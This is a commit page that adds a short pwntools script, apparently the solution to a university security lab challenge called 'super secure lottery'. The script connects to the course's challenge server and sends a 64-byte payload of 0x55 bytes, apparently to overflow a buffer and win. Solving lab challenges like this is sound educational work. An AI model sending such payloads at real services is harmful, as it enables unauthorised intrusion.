Lab6
This commit is contained in:
10
pa/lab6/chall_super_secure_lottery.py
Normal file
10
pa/lab6/chall_super_secure_lottery.py
Normal file
@@ -0,0 +1,10 @@
|
||||
from pwn import *
|
||||
|
||||
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
|
||||
PORT = 25161
|
||||
|
||||
conn = remote(HOST, PORT)
|
||||
conn.recvuntil(b":")
|
||||
pl = b"\x55"*(64)
|
||||
conn.send(pl)
|
||||
print(conn.recvline())
|
||||
Reference in New Issue
Block a user